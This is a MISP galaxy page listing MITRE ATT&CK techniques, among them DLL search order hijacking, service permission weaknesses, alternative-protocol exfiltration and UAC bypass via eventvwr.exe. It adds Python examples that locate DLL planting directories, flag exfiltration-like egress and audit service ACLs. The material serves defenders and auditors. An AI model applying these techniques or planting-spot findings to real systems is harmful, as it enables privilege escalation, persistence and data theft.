Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.

Many command shell utilities can be used to obtain this information. Examples include <code>dir</code>, <code>tree</code>, <code>ls</code>, <code>find</code>, and <code>locate</code>.(Citation: Windows Commands JPCERT) Custom tools may also be used to gather file and directory information and interact with the [Native API](https://attack.mitre.org/techniques/T1106). Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to gather file and directory information (e.g. <code>dir</code>, <code>show flash</code>, and/or <code>nvram</code>).(Citation: US-CERT-TA18-106A)

The tag is: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083"

Table 5535. Table References

Links

https://attack.mitre.org/techniques/T1083

https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html

https://www.us-cert.gov/ncas/alerts/TA18-106A

DLL Search Order Hijacking - T1038

Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft DLL Search) Adversaries may take advantage of the Windows DLL search order and programs that ambiguously specify DLLs to gain privilege escalation and persistence.

Adversaries may perform DLL preloading, also called binary planting attacks,(Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program. Remote DLL preloading attacks occur when a program sets its current directory to a remote location, such as a Web share, before loading a DLL.(Citation: Microsoft 2269637) Adversaries may use this behavior to cause the program to load a malicious DLL.
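The search order is deterministic, so the question for a given binary is simply which directories are consulted before the one holding the legitimate DLL, and which of those a low-privileged user can write to. The Python below is an added example, not code from the MISP galaxy or its sources: it models the documented default order (SafeDllSearchMode on: application directory, System32, the 16-bit System directory, the Windows directory, the current directory, then PATH; with SafeDllSearchMode off the current directory moves to second place) and the KnownDLLs rule, over a constructed file system in which a vendor application was installed with a writable directory.

```python
"""Walk the Windows DLL search order to find where a planted DLL would win.

Added example, not code from the MISP galaxy or MITRE ATT&CK. It models the
documented default order (SafeDllSearchMode on): application directory,
System32, the 16-bit System directory, the Windows directory, the current
directory, then PATH; with SafeDllSearchMode off the current directory moves
up to second place. KnownDLLs always come from System32. The file system,
writable directories and application are constructed.
"""
import ntpath

SYSTEM32 = r"C:\Windows\System32"
SYSTEM16 = r"C:\Windows\System"
WINDIR = r"C:\Windows"
KNOWN_DLLS = {"kernel32.dll", "user32.dll", "ws2_32.dll", "advapi32.dll", "ole32.dll"}  # subset


def search_order(app_dir, cwd, path_dirs, safe_search=True):
    system = [SYSTEM32, SYSTEM16, WINDIR]
    middle = system + [cwd] if safe_search else [cwd] + system
    return [app_dir] + middle + list(path_dirs)


def resolve_dll(name, fs, app_dir, cwd, path_dirs, safe_search=True):
    """First path in search order that exists in `fs` (a set of lower-cased paths)."""
    name = name.lower()
    if name in KNOWN_DLLS:
        return ntpath.join(SYSTEM32, name)
    for d in search_order(app_dir, cwd, path_dirs, safe_search):
        candidate = ntpath.join(d, name)
        if candidate.lower() in fs:
            return candidate
    return None


def planting_opportunities(name, fs, writable, app_dir, cwd, path_dirs, safe_search=True):
    """Writable directories searched before the legitimate copy of `name` is found."""
    name = name.lower()
    if name in KNOWN_DLLS:
        return []
    found = []
    for d in search_order(app_dir, cwd, path_dirs, safe_search):
        if ntpath.join(d, name).lower() in fs:
            break  # the real DLL wins from here on
        if d.lower() in writable:
            found.append(d)
    return found


# Constructed host: vendor app installed with a world-writable directory.
APP_DIR = r"C:\Program Files\Vendor\App"
DOWNLOADS = r"C:\Users\alice\Downloads"
PATH_DIRS = [r"C:\Windows\System32", r"C:\Users\alice\AppData\Local\Microsoft\WindowsApps"]
FS = {p.lower() for p in [
    ntpath.join(APP_DIR, "app.exe"),
    ntpath.join(SYSTEM32, "version.dll"),
    ntpath.join(SYSTEM32, "ws2_32.dll"),
]}
WRITABLE = {p.lower() for p in [APP_DIR, DOWNLOADS, PATH_DIRS[1]]}


if __name__ == "__main__":
    for dll in ("version.dll", "ws2_32.dll", "optional-plugin.dll"):
        print(dll, planting_opportunities(dll, FS, WRITABLE, APP_DIR, DOWNLOADS, PATH_DIRS))
```

A fully qualified path passed to LoadLibrary bypasses the search entirely, and SetDefaultDllDirectories, the LOAD_LIBRARY_SEARCH_* flags or a .local redirection change the order, so the model covers the ambiguously specified DLL name case the text describes. A DLL the program looks for but that exists nowhere on the system (the last line of the demo) is the easiest case: every writable directory in the order is a valid plant.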

Adversaries may also directly modify the way a program loads DLLs by replacing an existing DLL or modifying a .manifest or .local redirection file, directory, or junction to cause the program to load a different DLL to maintain persistence or privilege escalation. (Citation: Microsoft DLL Redirection) (Citation: Microsoft Manifests) (Citation: Mandiant Search Order)

If a search order-vulnerable program is configured to run at a higher privilege level, then the adversary-controlled DLL that is loaded will also be executed at the higher level. In this case, the technique could be used for privilege escalation from user to administrator or SYSTEM or from administrator to SYSTEM, depending on the program.

Programs that fall victim to path hijacking may appear to behave normally because malicious DLLs may be configured to also load the legitimate DLLs they were meant to replace.

The tag is: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1038"

Table 5536. Table References

Links

http://msdn.microsoft.com/en-US/library/ms682586

http://msdn.microsoft.com/en-US/library/ms682600

https://attack.mitre.org/techniques/T1038

https://capec.mitre.org/data/definitions/471.html

https://msdn.microsoft.com/en-US/library/aa375365

https://msrc-blog.microsoft.com/2010/08/21/microsoft-security-advisory-2269637-released/

https://www.mandiant.com/blog/dll-search-order-hijacking-revisited/

https://www.owasp.org/index.php/Binary_planting

Deploy exploit using advertising - T1380

This technique has been deprecated. Please see ATT&CK’s Initial Access and Execution tactics for replacement techniques.

Exploits spread through advertising (malvertising) involve injecting malicious or malware-laden advertisements into legitimate online advertising networks and webpages. (Citation: TPMalvertising)

The tag is: misp-galaxy:mitre-attack-pattern="Deploy exploit using advertising - T1380"

Table 5537. Table References

Links

https://attack.mitre.org/techniques/T1380

Detect App Analysis Environment - T1440

An adversary could evade app vetting techniques by placing code in a malicious application to detect whether it is running in an app analysis environment and, if so, avoid performing malicious actions while under analysis.

Discussion of general Android anti-analysis techniques can be found in (Citation: Petsas). Discussion of Google Play Store-specific anti-analysis techniques can be found in (Citation: Oberheide-Bouncer), (Citation: Percoco-Bouncer).

(Citation: Wang) presents a discussion of iOS anti-analysis techniques.

Platforms: Android, iOS

The tag is: misp-galaxy:mitre-attack-pattern="Detect App Analysis Environment - T1440"

Detect App Analysis Environment - T1440 has relationships with:

  • revoked-by: misp-galaxy:mitre-attack-pattern="Deliver Malicious App via Authorized App Store - T1475" with estimative-language:likelihood-probability="almost-certain"

Table 5538. Table References

Links

https://attack.mitre.org/techniques/T1440

Exploitation for Privilege Escalation - T1404

Adversaries may exploit software vulnerabilities in order to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in an application, service, within the operating system software, or kernel itself to execute adversary-controlled code. Security constructs, such as permission levels, will often hinder access to information and use of certain techniques. Adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.

When initially gaining access to a device, an adversary may be operating within a lower privileged process which will prevent them from accessing certain resources on the system. Vulnerabilities may exist, usually in operating system components and applications running at higher permissions, that can be exploited to gain higher levels of access on the system. This could enable someone to move from unprivileged or user-level permission to root permissions depending on the component that is vulnerable.

The tag is: misp-galaxy:mitre-attack-pattern="Exploitation for Privilege Escalation - T1404"

Table 5539. Table References

Links

https://attack.mitre.org/techniques/T1404

https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-26.html

File System Permissions Weakness - T1044

Processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.

Adversaries may use this technique to replace legitimate binaries with malicious ones as a means of executing code at a higher permissions level. If the executing process is set to run at a specific time or during a certain event (e.g., system bootup) then this technique can also be used for persistence.

Services

Manipulation of Windows service binaries is one variation of this technique. Adversaries may replace a legitimate service executable with their own executable to gain persistence and/or privilege escalation to the account context the service is set to execute under (local/domain account, SYSTEM, LocalService, or NetworkService). Once the service is started, either directly by the user (if appropriate access is available) or through some other means, such as a system restart if the service starts on bootup, the replaced executable will run instead of the original service executable.

Executable Installers

Another variation of this technique can be performed by taking advantage of a weakness that is common in executable, self-extracting installers. During the installation process, it is common for installers to use a subdirectory within the <code>%TEMP%</code> directory to unpack binaries such as DLLs, EXEs, or other payloads. When installers create subdirectories and files they often do not set appropriate permissions to restrict write access, which allows for execution of untrusted code placed in the subdirectories or overwriting of binaries used in the installation process. This behavior is related to and may take advantage of [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1038). Some installers may also require elevated privileges that will result in privilege escalation when executing adversary controlled code. This behavior is related to [Bypass User Account Control](https://attack.mitre.org/techniques/T1088). Several examples of this weakness in existing common installers have been reported to software vendors. (Citation: Mozilla Firefox Installer DLL Hijack) (Citation: Seclists Kanthak 7zip Installer)

The tag is: misp-galaxy:mitre-attack-pattern="File System Permissions Weakness - T1044"

Table 5540. Table References

Links

http://seclists.org/fulldisclosure/2015/Dec/34

https://attack.mitre.org/techniques/T1044

https://capec.mitre.org/data/definitions/17.html

https://www.mozilla.org/en-US/security/advisories/mfsa2012-98/

Obfuscated Files or Information - T1406

Adversaries may attempt to make a payload or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the device or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.

Payloads may be compressed, archived, or encrypted in order to avoid detection. These payloads may be used during Initial Access or later to mitigate detection. Portions of files can also be encoded to hide the plaintext strings that would otherwise help defenders with discovery. Payloads may also be split into separate, seemingly benign files that only reveal malicious functionality when reassembled.(Citation: Microsoft MalLockerB)

The tag is: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1406"

Table 5541. Table References

Links

https://attack.mitre.org/techniques/T1406

https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-21.html

https://www.microsoft.com/security/blog/2020/10/08/sophisticated-new-android-malware-marks-the-latest-evolution-of-mobile-ransomware/

Obtain Device Cloud Backups - T1470

An adversary who is able to obtain unauthorized access to or misuse authorized access to cloud backup services (e.g. Google’s Android backup service or Apple’s iCloud) could use that access to obtain sensitive data stored in device backups. For example, the Elcomsoft Phone Breaker product advertises the ability to retrieve iOS backup data from Apple’s iCloud (Citation: Elcomsoft-EPPB). Elcomsoft also describes (Citation: Elcomsoft-WhatsApp) obtaining WhatsApp communication histories from backups stored in iCloud.

The tag is: misp-galaxy:mitre-attack-pattern="Obtain Device Cloud Backups - T1470"

Table 5542. Table References

Links

https://attack.mitre.org/techniques/T1470

https://blog.elcomsoft.com/2017/07/extract-and-decrypt-whatsapp-backups-from-icloud/

https://pages.nist.gov/mobile-threat-catalogue/ecosystem-threats/ECO-0.html

https://pages.nist.gov/mobile-threat-catalogue/ecosystem-threats/ECO-1.html

https://www.elcomsoft.com/eppb.html

Exfiltration Over Alternative Protocol - T1048

Adversaries may steal data by exfiltrating it over a different protocol than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.

Alternate protocols include FTP, SMTP, HTTP/S, DNS, SMB, or any other network protocol not being used as the main command and control channel. Adversaries may also opt to encrypt and/or obfuscate these alternate channels.

[Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048) can be done using various common operating system utilities such as [Net](https://attack.mitre.org/software/S0039)/SMB or FTP.(Citation: Palo Alto OilRig Oct 2016) On macOS and Linux <code>curl</code> may be used to invoke protocols such as HTTP/S or FTP/S to exfiltrate data from a system.(Citation: 20 macOS Common Tools and Techniques)

Many IaaS and SaaS platforms (such as Microsoft Exchange, Microsoft SharePoint, GitHub, and AWS S3) support the direct download of files, emails, source code, and other sensitive information via the web console or [Cloud API](https://attack.mitre.org/techniques/T1059/009).
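Because the defender does not know which channel is the "main" C2, the practical detection for this technique is per-host egress volume by protocol rather than protocol identity. The following is an added example, not code from the MISP galaxy or ATT&CK: it reads Zeek-style `conn` records (tab-separated, constructed here), sums outbound bytes from internal hosts to external addresses per (host, service), and flags pairs that are both large and strongly upload-skewed. The 10.0.0.0/8 internal range, the 5 MiB threshold and the 4:1 upload ratio are assumptions to tune per environment; the sample addresses are RFC 5737 documentation ranges.

```python
"""Added example: flag upload-heavy egress per host and protocol from conn logs.
The log lines, thresholds and internal-range rule are constructed for the demo."""
import csv
import io
from collections import defaultdict

# Constructed sample in Zeek conn.log column style (only the fields this check needs).
SAMPLE_CONN_LOG = """\
ts\tid.orig_h\tid.resp_h\tid.resp_p\tproto\tservice\torig_bytes\tresp_bytes
1700000000.1\t10.0.0.5\t203.0.113.10\t443\ttcp\tssl\t18000\t2400000
1700000001.2\t10.0.0.5\t203.0.113.10\t443\ttcp\tssl\t22000\t1900000
1700000002.3\t10.0.0.5\t198.51.100.7\t53\tudp\tdns\t9400000\t120000
1700000003.4\t10.0.0.9\t203.0.113.44\t21\ttcp\tftp\t52000000\t9000
1700000004.5\t10.0.0.9\t203.0.113.10\t443\ttcp\tssl\t30000\t800000
1700000005.6\t10.0.0.12\t192.0.2.20\t25\ttcp\tsmtp\t40000\t6000
"""

UPLOAD_THRESHOLD_BYTES = 5 * 1024 * 1024   # assumption: 5 MiB outbound per (host, service)
MIN_UPLOAD_RATIO = 4.0                     # assumption: bytes out / bytes in

def is_internal(ip):
    """Assumption for the demo: 10.0.0.0/8 is the monitored internal range."""
    return ip.startswith("10.")

def summarize_egress(log_text):
    """Sum (orig_bytes, resp_bytes) per (internal host, service) for external destinations."""
    totals = defaultdict(lambda: [0, 0])
    for row in csv.DictReader(io.StringIO(log_text), delimiter="\t"):
        src, dst = row["id.orig_h"], row["id.resp_h"]
        if not is_internal(src) or is_internal(dst):
            continue                                   # only internal -> external flows
        key = (src, row["service"])
        totals[key][0] += int(row["orig_bytes"])
        totals[key][1] += int(row["resp_bytes"])
    return totals

def find_exfil_candidates(log_text, threshold=UPLOAD_THRESHOLD_BYTES, ratio=MIN_UPLOAD_RATIO):
    """Return alerts for (host, service) pairs that pushed out a lot more than they pulled.
    Encryption or obfuscation of the channel does not change the byte counts."""
    alerts = []
    for (host, service), (up, down) in summarize_egress(log_text).items():
        skew = up / max(down, 1)
        if up >= threshold and skew >= ratio:
            alerts.append({"host": host, "service": service,
                           "bytes_out": up, "ratio": round(skew, 1)})
    return sorted(alerts, key=lambda a: -a["bytes_out"])

if __name__ == "__main__":
    for alert in find_exfil_candidates(SAMPLE_CONN_LOG):
        print(f"{alert['host']} sent {alert['bytes_out']} bytes over {alert['service']} "
              f"(out/in ratio {alert['ratio']})")
```

In the sample, the DNS and FTP uploads are flagged while the browsing-shaped TLS traffic and the small SMTP session are not. Sanctioned bulk uploaders (backup agents, cloud sync) need a per-host baseline or allow-list before this is useful as an alert rather than a hunt query.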

The tag is: misp-galaxy:mitre-attack-pattern="Exfiltration Over Alternative Protocol - T1048"

Table 5543. Table References

Links

http://researchcenter.paloaltonetworks.com/2016/10/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets/

https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

https://attack.mitre.org/techniques/T1048

https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/

System Network Connections Discovery - T1049

Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.

An adversary who gains access to a system that is part of a cloud-based environment may map out Virtual Private Clouds or Virtual Networks in order to determine what systems and services are connected. The actions performed are likely the same types of discovery techniques depending on the operating system, but the resulting information may include details about the networked cloud environment relevant to the adversary’s goals. Cloud providers may have different ways in which their virtual networks operate.(Citation: Amazon AWS VPC Guide)(Citation: Microsoft Azure Virtual Network Overview)(Citation: Google VPC Overview) Similarly, adversaries who gain access to network devices may also perform similar discovery activities to gather information about connected systems and services.

Utilities and commands that acquire this information include [netstat](https://attack.mitre.org/software/S0104), "net use," and "net session" with [Net](https://attack.mitre.org/software/S0039). In Mac and Linux, [netstat](https://attack.mitre.org/software/S0104) and <code>lsof</code> can be used to list current connections. <code>who -a</code> and <code>w</code> can be used to show which users are currently logged in, similar to "net session". Additionally, built-in features native to network devices and [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) may be used (e.g. <code>show ip sockets</code>, <code>show tcp brief</code>).(Citation: US-CERT-TA18-106A)

The tag is: misp-galaxy:mitre-attack-pattern="System Network Connections Discovery - T1049"

Table 5544. Table References

Links

https://attack.mitre.org/techniques/T1049

https://cloud.google.com/vpc/docs/vpc

https://docs.aws.amazon.com/vpc/latest/userguide/what-is-amazon-vpc.html

https://docs.microsoft.com/en-us/azure/virtual-network/virtual-networks-overview

https://www.us-cert.gov/ncas/alerts/TA18-106A

Use Alternate Authentication Material - T1550

Adversaries may use alternate authentication material, such as password hashes, Kerberos tickets, and application access tokens, in order to move laterally within an environment and bypass normal system access controls.

Authentication processes generally require a valid identity (e.g., username) along with one or more authentication factors (e.g., password, pin, physical smart card, token generator, etc.). Alternate authentication material is legitimately generated by systems after a user or application successfully authenticates by providing a valid identity and the required authentication factor(s). Alternate authentication material may also be generated during the identity creation process.(Citation: NIST Authentication)(Citation: NIST MFA)

Caching alternate authentication material allows the system to verify an identity has successfully authenticated without asking the user to reenter authentication factor(s). Because the alternate authentication must be maintained by the system—either in memory or on disk—it may be at risk of being stolen through [Credential Access](https://attack.mitre.org/tactics/TA0006) techniques. By stealing alternate authentication material, adversaries are able to bypass system access controls and authenticate to systems without knowing the plaintext password or any additional authentication factors.

The tag is: misp-galaxy:mitre-attack-pattern="Use Alternate Authentication Material - T1550"

Table 5545. Table References

Links

https://attack.mitre.org/techniques/T1550

https://csrc.nist.gov/glossary/term/Multi_Factor-Authentication

https://csrc.nist.gov/glossary/term/authentication

https://technet.microsoft.com/en-us/library/dn487457.aspx

Service Registry Permissions Weakness - T1058

Windows stores local service configuration information in the Registry under <code>HKLM\SYSTEM\CurrentControlSet\Services</code>. The information stored under a service’s Registry keys can be manipulated to modify a service’s execution parameters through tools such as the service controller, sc.exe, [PowerShell](https://attack.mitre.org/techniques/T1086), or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys is controlled through Access Control Lists and permissions. (Citation: MSDN Registry Key Security)

If the permissions for users and groups are not properly set and allow access to the Registry keys for a service, then adversaries can change the service binPath/ImagePath to point to a different executable under their control. When the service starts or is restarted, then the adversary-controlled program will execute, allowing the adversary to gain persistence and/or privilege escalation to the account context the service is set to execute under (local/domain account, SYSTEM, LocalService, or NetworkService).

Adversaries may also alter Registry keys associated with service failure parameters (such as <code>FailureCommand</code>) that may be executed in an elevated context anytime the service fails or is intentionally corrupted.(Citation: TrustedSignal Service Failure)(Citation: Twitter Service Recovery Nov 2017)
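Both of the service-related weaknesses on this page, the writable service binary of File System Permissions Weakness (T1044) and the writable service Registry key of Service Registry Permissions Weakness (T1058), reduce to the same audit question: can a low-privilege principal modify what the service runs? The following is an added example, not code from the MISP galaxy or ATT&CK, that answers it for a list of service records. The `Service` and `Ace` records are hypothetical containers for what `sc qc`, `icacls` on the binary and `Get-Acl` on `HKLM\SYSTEM\CurrentControlSet\Services\<name>` would report; the services, ACL entries and right names are constructed for the demo.

```python
"""Added example: audit services for writable binaries (T1044) and writable
Registry keys (T1058). Service records and ACLs are constructed for the demo."""
from dataclasses import dataclass

# Principals every authenticated low-privilege user belongs to.
LOW_PRIV_PRINCIPALS = {
    "BUILTIN\\Users",
    "NT AUTHORITY\\Authenticated Users",
    "Everyone",
    "NT AUTHORITY\\INTERACTIVE",
}
# icacls shorthand rights that allow replacing or changing a file.
FILE_WRITE_RIGHTS = {"W", "M", "F"}
# Registry rights that allow changing ImagePath or FailureCommand.
KEY_WRITE_RIGHTS = {"SetValue", "CreateSubKey", "WriteKey", "FullControl"}

@dataclass
class Ace:
    principal: str
    rights: frozenset

@dataclass
class Service:
    name: str
    image_path: str
    run_as: str
    binary_acl: list
    key_acl: list
    failure_command: str = ""

def _low_priv_writers(acl, write_rights):
    return sorted(ace.principal for ace in acl
                  if ace.principal in LOW_PRIV_PRINCIPALS and ace.rights & write_rights)

def audit_service(svc):
    """Return one finding per weakness; `runs_as` is the context an attacker gains."""
    findings = []
    writers = _low_priv_writers(svc.binary_acl, FILE_WRITE_RIGHTS)
    if writers:
        findings.append({"technique": "T1044", "runs_as": svc.run_as,
                         "detail": f"{svc.image_path} is writable by {', '.join(writers)}"})
    writers = _low_priv_writers(svc.key_acl, KEY_WRITE_RIGHTS)
    if writers:
        detail = (f"HKLM\\SYSTEM\\CurrentControlSet\\Services\\{svc.name} is writable by "
                  f"{', '.join(writers)}; ImagePath can be repointed")
        if svc.failure_command:
            detail += f"; FailureCommand is set ({svc.failure_command}) and can be repointed too"
        findings.append({"technique": "T1058", "runs_as": svc.run_as, "detail": detail})
    return findings

def audit_services(services):
    report = {}
    for svc in services:
        findings = audit_service(svc)
        if findings:
            report[svc.name] = findings
    return report

# Constructed sample: one weak binary ACL, one weak key ACL, one clean service.
SAMPLE_SERVICES = [
    Service("AcmeUpdater", r"C:\Program Files\Acme\updater.exe", "LocalSystem",
            binary_acl=[Ace("BUILTIN\\Administrators", frozenset({"F"})),
                        Ace("BUILTIN\\Users", frozenset({"M"}))],            # Modify for Users
            key_acl=[Ace("BUILTIN\\Administrators", frozenset({"FullControl"})),
                     Ace("BUILTIN\\Users", frozenset({"ReadKey"}))]),
    Service("LegacyAgent", r"C:\Program Files\Legacy\agent.exe", "NT AUTHORITY\\NetworkService",
            binary_acl=[Ace("BUILTIN\\Administrators", frozenset({"F"})),
                        Ace("BUILTIN\\Users", frozenset({"RX"}))],
            key_acl=[Ace("NT AUTHORITY\\Authenticated Users", frozenset({"SetValue", "ReadKey"}))],
            failure_command=r"C:\Program Files\Legacy\restart.cmd"),
    Service("WellConfigured", r"C:\Windows\System32\examplesvc.exe", "LocalSystem",
            binary_acl=[Ace("NT SERVICE\\TrustedInstaller", frozenset({"F"})),
                        Ace("BUILTIN\\Users", frozenset({"RX"}))],
            key_acl=[Ace("BUILTIN\\Administrators", frozenset({"FullControl"})),
                     Ace("BUILTIN\\Users", frozenset({"ReadKey"}))]),
]

if __name__ == "__main__":
    for name, findings in audit_services(SAMPLE_SERVICES).items():
        for f in findings:
            print(f"{name} [{f['technique']}] -> {f['runs_as']}: {f['detail']}")
```

The principal set is deliberately narrow; a real audit should also expand group memberships of the account being assessed, since write access granted to a custom group the user belongs to is just as exploitable.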

The tag is: misp-galaxy:mitre-attack-pattern="Service Registry Permissions Weakness - T1058"

Table 5546. Table References

Links

https://attack.mitre.org/techniques/T1058

https://capec.mitre.org/data/definitions/478.html

https://msdn.microsoft.com/library/windows/desktop/ms724878.aspx

https://technet.microsoft.com/en-us/sysinternals/bb963902

https://trustedsignal.blogspot.com/2014/05/kansa-service-related-collectors-and.html

https://twitter.com/r0wdy_/status/936365549553991680

Command and Scripting Interpreter - T1059

Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of [Unix Shell](https://attack.mitre.org/techniques/T1059/004) while Windows installations include the [Windows Command Shell](https://attack.mitre.org/techniques/T1059/003) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).

There are also cross-platform interpreters such as [Python](https://attack.mitre.org/techniques/T1059/006), as well as those commonly associated with client applications such as [JavaScript](https://attack.mitre.org/techniques/T1059/007) and [Visual Basic](https://attack.mitre.org/techniques/T1059/005).

Adversaries may abuse these technologies in various ways as a means of executing arbitrary commands. Commands and scripts can be embedded in [Initial Access](https://attack.mitre.org/tactics/TA0001) payloads delivered to victims as lure documents or as secondary payloads downloaded from an existing C2. Adversaries may also execute commands through interactive terminals/shells, as well as utilize various [Remote Services](https://attack.mitre.org/techniques/T1021) in order to achieve remote Execution.(Citation: Powershell Remote Commands)(Citation: Cisco IOS Software Integrity Assurance - Command History)(Citation: Remote Shell Execution in Python)

The tag is: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059"

Table 5547. Table References

Links

https://attack.mitre.org/techniques/T1059

https://docs.microsoft.com/en-us/powershell/scripting/learn/remoting/running-remote-commands?view=powershell-7.1

https://tools.cisco.com/security/center/resources/integrity_assurance.html#23

https://www.thepythoncode.com/article/executing-bash-commands-remotely-in-python

Gather Victim Network Information - T1590

Adversaries may gather information about the victim’s networks that can be used during targeting. Information about networks may include a variety of details, including administrative data (ex: IP ranges, domain names, etc.) as well as specifics regarding its topology and operations.

Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about networks may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: WHOIS)(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).

The tag is: misp-galaxy:mitre-attack-pattern="Gather Victim Network Information - T1590"

Table 5548. Table References

Links

https://attack.mitre.org/techniques/T1590

https://dnsdumpster.com/

https://www.circl.lu/services/passive-dns/

https://www.whois.net/

Indicator Removal from Tools - T1066

If a malicious tool is detected and quarantined or otherwise curtailed, an adversary may be able to determine why the malicious tool was detected (the indicator), modify the tool by removing the indicator, and use the updated version that is no longer detected by the target’s defensive systems or subsequent targets that may use similar systems.

A good example of this is when malware is detected with a file signature and quarantined by anti-virus software. An adversary who can determine that the malware was quarantined because of its file signature may use [Software Packing](https://attack.mitre.org/techniques/T1045) or otherwise modify the file so it has a different signature, and then re-use the malware.

The tag is: misp-galaxy:mitre-attack-pattern="Indicator Removal from Tools - T1066"

Table 5549. Table References

Links

https://attack.mitre.org/techniques/T1066

Exploitation for Privilege Escalation - T1068

Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.

When initially gaining access to a system, an adversary may be operating within a lower privileged process which will prevent them from accessing certain resources on the system. Vulnerabilities may exist, usually in operating system components and software commonly running at higher permissions, that can be exploited to gain higher levels of access on the system. This could enable someone to move from unprivileged or user level permissions to SYSTEM or root permissions depending on the component that is vulnerable. This could also enable an adversary to move from a virtualized environment, such as within a virtual machine or container, onto the underlying host. This may be a necessary step for an adversary compromising an endpoint system that has been properly configured and limits other privilege escalation methods.

Adversaries may bring a signed vulnerable driver onto a compromised machine so that they can exploit the vulnerability to execute code in kernel mode. This process is sometimes referred to as Bring Your Own Vulnerable Driver (BYOVD).(Citation: ESET InvisiMole June 2020)(Citation: Unit42 AcidBox June 2020) Adversaries may include the vulnerable driver with files delivered during Initial Access or download it to a compromised system via [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105) or [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570).

The tag is: misp-galaxy:mitre-attack-pattern="Exploitation for Privilege Escalation - T1068"

Table 5550. Table References

Links

https://attack.mitre.org/techniques/T1068

https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules

https://unit42.paloaltonetworks.com/acidbox-rare-malware/

https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf

Bypass User Account Control - T1088

Windows User Account Control (UAC) allows a program to elevate its privileges to perform a task under administrator-level permissions by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action. (Citation: TechNet How UAC Works)

If the UAC protection level of a computer is set to anything but the highest level, certain Windows programs are allowed to elevate privileges or execute some elevated COM objects without prompting the user through the UAC notification box. (Citation: TechNet Inside UAC) (Citation: MSDN COM Elevation) An example of this is use of rundll32.exe to load a specifically crafted DLL which loads an auto-elevated COM object and performs a file operation in a protected directory which would typically require elevated access. Malicious software may also be injected into a trusted process to gain elevated privileges without prompting a user. (Citation: Davidson Windows) Adversaries can use these techniques to elevate privileges to administrator if the target process is unprotected.

Many methods have been discovered to bypass UAC. The Github readme page for UACMe contains an extensive list of methods (Citation: Github UACMe) that have been discovered and implemented within UACMe, but may not be a comprehensive list of bypasses. Additional bypass methods are regularly discovered and some used in the wild, such as:

  • <code>eventvwr.exe</code> can auto-elevate and execute a specified binary or script. (Citation: enigma0x3 Fileless UAC Bypass) (Citation: Fortinet Fareit)

Another bypass is possible through some Lateral Movement techniques if credentials for an account with administrator privileges are known, since UAC is a single system security mechanism, and the privilege or integrity of a process running on one system will be unknown on lateral systems and default to high integrity. (Citation: SANS UAC Bypass)

The tag is: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1088"

Table 5551. Table References

Links

http://pen-testing.sans.org/blog/pen-testing/2013/08/08/psexec-uac-bypass

http://www.pretentiousname.com/misc/win7_uac_whitelist2.html

https://attack.mitre.org/techniques/T1088

https://blog.fortinet.com/2016/12/16/malicious-macro-bypasses-uac-to-elevate-privilege-for-fareit-malware

https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/

